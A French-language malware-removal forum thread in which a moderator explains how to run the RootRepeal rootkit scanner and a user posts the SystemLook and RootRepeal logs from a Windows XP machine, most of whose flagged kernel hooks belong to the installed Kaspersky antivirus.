Faire un double clic sur RootRepeal.exe pour lancer l'outil.

Cliquer sur l'onglet Report (en bas de la fenêtre) comme ceci:
Image

Cliquer sur le bouton Scan
Image

Dans la nouvelle fenêtre Select Scan, cocher:
+ Drivers
+ Files
+ Processes
+ SSDT
+ Stealth Objects
+ Hidden Services
+ Shadow SSDT

Image

Cliquer sur le bouton OK
Dans la nouvelle fenêtre Select Drives, cocher le lecteur système (généralement C:\)
Image

Cliquer sur le bouton OK pour lancer l'analyse

Note: Cette analyse prend un certain temps. NE PAS LANCER d'autres programmes tant qu'elle est active.

Lorsque l'analyse est terminée, le bouton Save Report sera disponible.
Image

Cliquer sur ce bouton Save Report et enregistrer le fichier rapport dans le dossier RootRepeal sous le nom RootRepeal-110513.txt

Ouvrir le menu File (tout en haut, à gauche), cliquer sur Exit pour fermer le programme.

Étape 4: Processus de contrôle en temps réel
Important: Réactiver le module résident de l'antivirus.

Étape 5: Résultat
Envoyer en réponse:
*- le rapport de RootRepeal (contenu du fichier RootRepeal-110513.txt)
Ce rapport peut être très long. Bien vérifier qu'il est complet dans le message envoyé. Si nécessaire, le découper en plusieurs messages.

Note importante: Pour l'envoi de ta(tes) réponse(s), il ne faut pas créer un nouveau sujet, mais cliquer sur le bouton "Répondre"
Image pour continuer dans ce fil de discussion.

A suivre,
nickW - Image
30/07/2012: Plus de désinfection de PC jusqu'à nouvel ordre.
Pas de demande d'analyse de log en MP (Message Privé)
Mes configs
Avatar de l’utilisateur
nickW
Modérateur
 
Messages: 21698
Inscription: 20 Mai 2004, 17:41
Localisation: Dordogne/Île de France

Re: Demande d'étude de rapports

Messagede bea23 » 15 Mai 2011, 14:34

Bonjour,
Voici le rapport de SystemLook:

SystemLook 04.09.10 by jpshortstuff
Log created at 14:37 on 15/05/2011 by Karim
Administrator - Elevation successful

========== filefind ==========

Searching for "*cleansweep*"
No files found.

========== folderfind ==========

Searching for "*cleansweep*"
No folders found.

========== regfind ==========

Searching for "cleansweep"
No data found.

-= EOF =-
bea23
 
Messages: 16
Inscription: 11 Mai 2011, 08:49

Re: Demande d'étude de rapports

Messagede bea23 » 15 Mai 2011, 14:34

Et voici celui de RootRepeal:
ROOTREPEAL (c) AD, 2007-2009
==================================================
Scan Start Time: 2011/05/15 14:59
Program Version: Version 1.3.5.0
Windows Version: Windows XP SP3
==================================================

Drivers
-------------------
Name: dump_atapi.sys
Image Path: C:\WINDOWS\System32\Drivers\dump_atapi.sys
Address: 0xF2EA4000 Size: 98304 File Visible: No Signed: -
Status: -

Name: dump_WMILIB.SYS
Image Path: C:\WINDOWS\System32\Drivers\dump_WMILIB.SYS
Address: 0xF7AC6000 Size: 8192 File Visible: No Signed: -
Status: -

Name: rootrepeal.sys
Image Path: C:\WINDOWS\system32\drivers\rootrepeal.sys
Address: 0xEF173000 Size: 49152 File Visible: No Signed: -
Status: -

Hidden/Locked Files
-------------------
Path: c:\windows\temp\perflib_perfdata_268.dat
Status: Allocation size mismatch (API: 16384, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\02\0000000e_events.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\02\0000000e_objdt.dat
Status: Allocation size mismatch (API: 8, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\02\0000000e_objid.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\03\00000010_events.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\03\00000010_objdt.dat
Status: Allocation size mismatch (API: 8, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\03\00000010_objid.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\04\0000000e_events.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\04\0000000e_objdt.dat
Status: Allocation size mismatch (API: 8, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\04\0000000e_objid.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\09\0000000e_events.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\09\0000000e_objdt.dat
Status: Allocation size mismatch (API: 8, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\09\0000000e_objid.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\0a\0000000e_events.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\0a\0000000e_objdt.dat
Status: Allocation size mismatch (API: 8, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\0a\0000000e_objid.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\0d\0000000e_events.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\0d\0000000e_objdt.dat
Status: Allocation size mismatch (API: 8, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\0d\0000000e_objid.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\0e\0000000e_events.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\0e\0000000e_objdt.dat
Status: Allocation size mismatch (API: 8, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\0e\0000000e_objid.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\12\0000000e_events.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\12\0000000e_objdt.dat
Status: Allocation size mismatch (API: 8, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\12\0000000e_objid.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\13\0000000e_events.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\13\0000000e_objdt.dat
Status: Allocation size mismatch (API: 8, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\1e\0000000e_events.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\1e\0000000e_objdt.dat
Status: Allocation size mismatch (API: 8, Raw: 0)

Path: c:\documents and settings\all users\application data\kaspersky lab\avp9\report\1e\0000000e_objid.dat
Status: Allocation size mismatch (API: 16, Raw: 0)

Path: C:\Documents and Settings\Karim\Local Settings\Apps\2.0\501NMCKT.ZEN\XQT4XRTV.CZL\manifests\clickonce_bootstrap.exe.cdf-ms
Status: Locked to the Windows API!

Path: C:\Documents and Settings\Karim\Local Settings\Apps\2.0\501NMCKT.ZEN\XQT4XRTV.CZL\manifests\clickonce_bootstrap.exe.manifest
Status: Locked to the Windows API!

Path: C:\Documents and Settings\Karim\Local Settings\Apps\2.0\501NMCKT.ZEN\XQT4XRTV.CZL\manifests\clickonce_bootstrap.exe.cdf-ms
Status: Locked to the Windows API!

Path: C:\Documents and Settings\Karim\Local Settings\Apps\2.0\501NMCKT.ZEN\XQT4XRTV.CZL\manifests\clickonce_bootstrap.exe.manifest
Status: Locked to the Windows API!

SSDT
-------------------
#: 011 Function Name: NtAdjustPrivilegesToken
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c6598

#: 025 Function Name: NtClose
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c6e18

#: 031 Function Name: NtConnectPort
Status: Hooked by "<unknown>" at address 0x86cf6a30

#: 035 Function Name: NtCreateEvent
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c7ea0

#: 037 Function Name: NtCreateFile
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c70fa

#: 041 Function Name: NtCreateKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c5442

#: 043 Function Name: NtCreateMutant
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c7d78

#: 044 Function Name: NtCreateNamedPipeFile
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c619e

#: 046 Function Name: NtCreatePort
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c7c34

#: 050 Function Name: NtCreateSection
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c635a

#: 051 Function Name: NtCreateSemaphore
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c7fd2

#: 052 Function Name: NtCreateSymbolicLinkObject
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c9c14

#: 053 Function Name: NtCreateThread
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c6ab6

#: 056 Function Name: NtCreateWaitablePort
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c7cd6

#: 057 Function Name: NtDebugActiveProcess
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c9606

#: 063 Function Name: NtDeleteKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c5a06

#: 065 Function Name: NtDeleteValueKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c5d94

#: 066 Function Name: NtDeviceIoControlFile
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c7582

#: 068 Function Name: NtDuplicateObject
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37ca5d6

#: 071 Function Name: NtEnumerateKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c5ed6

#: 073 Function Name: NtEnumerateValueKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c5f80

#: 084 Function Name: NtFsControlFile
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c738e

#: 097 Function Name: NtLoadDriver
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c9698

#: 098 Function Name: NtLoadKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c541e

#: 099 Function Name: NtLoadKey2
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c5430

#: 108 Function Name: NtMapViewOfSection
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c9cc8

#: 111 Function Name: NtNotifyChangeKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c60cc

#: 114 Function Name: NtOpenEvent
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c7f42

#: 116 Function Name: NtOpenFile
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c6e9a

#: 119 Function Name: NtOpenKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c55e8

#: 120 Function Name: NtOpenMutant
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c7e10

#: 122 Function Name: NtOpenProcess
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c679e

#: 125 Function Name: NtOpenSection
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c9c3e

#: 126 Function Name: NtOpenSemaphore
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c8074

#: 128 Function Name: NtOpenThread
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c66c2

#: 160 Function Name: NtQueryKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c602a

#: 161 Function Name: NtQueryMultipleValueKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c5c52

#: 167 Function Name: NtQuerySection
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c9fe0

#: 177 Function Name: NtQueryValueKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c58a2

#: 180 Function Name: NtQueueApcThread
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c992e

#: 192 Function Name: NtRenameKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c5b1a

#: 193 Function Name: NtReplaceKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c52bc

#: 194 Function Name: NtReplyPort
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c83fe

#: 195 Function Name: NtReplyWaitReceivePort
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c82c4

#: 200 Function Name: NtRequestWaitReplyPort
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c93a6

#: 204 Function Name: NtRestoreKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37cce38

#: 206 Function Name: NtResumeThread
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37ca4b8

#: 207 Function Name: NtSaveKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c5254

#: 210 Function Name: NtSecureConnectPort
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c7668

#: 213 Function Name: NtSetContextThread
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c6cd4

#: 230 Function Name: NtSetInformationToken
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c8c56

#: 237 Function Name: NtSetSecurityObject
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c9792

#: 240 Function Name: NtSetSystemInformation
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37ca120

#: 247 Function Name: NtSetValueKey
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c572a

#: 253 Function Name: NtSuspendProcess
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37ca204

#: 254 Function Name: NtSuspendThread
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37ca32c

#: 255 Function Name: NtSystemDebugControl
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c9532

#: 257 Function Name: NtTerminateProcess
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c6916

#: 258 Function Name: NtTerminateThread
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c686c

#: 267 Function Name: NtUnmapViewOfSection
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c9e96

#: 277 Function Name: NtWriteVirtualMemory
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37c69f6

Shadow SSDT
-------------------
#: 013 Function Name: NtGdiBitBlt
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7cb2

#: 227 Function Name: NtGdiMaskBlt
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7d7c

#: 237 Function Name: NtGdiPlgBlt
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7de6

#: 292 Function Name: NtGdiStretchBlt
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7d16

#: 307 Function Name: NtUserAttachThreadInput
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d78c6

#: 323 Function Name: NtUserCallOneParam
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7c7e

#: 378 Function Name: NtUserFindWindowEx
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7ab4

#: 383 Function Name: NtUserGetAsyncKeyState
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d782e

#: 414 Function Name: NtUserGetKeyboardState
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7bb6

#: 416 Function Name: NtUserGetKeyState
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d787a

#: 460 Function Name: NtUserMessageCall
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7a06

#: 475 Function Name: NtUserPostMessage
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d795c

#: 476 Function Name: NtUserPostThreadMessage
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d79b0

#: 491 Function Name: NtUserRegisterRawInputDevices
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7b46

#: 502 Function Name: NtUserSendInput
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d7a66

#: 549 Function Name: NtUserSetWindowsHookEx
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d777e

#: 552 Function Name: NtUserSetWinEventHook
Status: Hooked by "C:\WINDOWS\system32\DRIVERS\klif.sys" at address 0xf37d77d4

==EOF==
bea23
 
Messages: 16
Inscription: 11 Mai 2011, 08:49

Suivante

Retourner vers Sécurité (Contamination - Décontamination)

Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 28 invités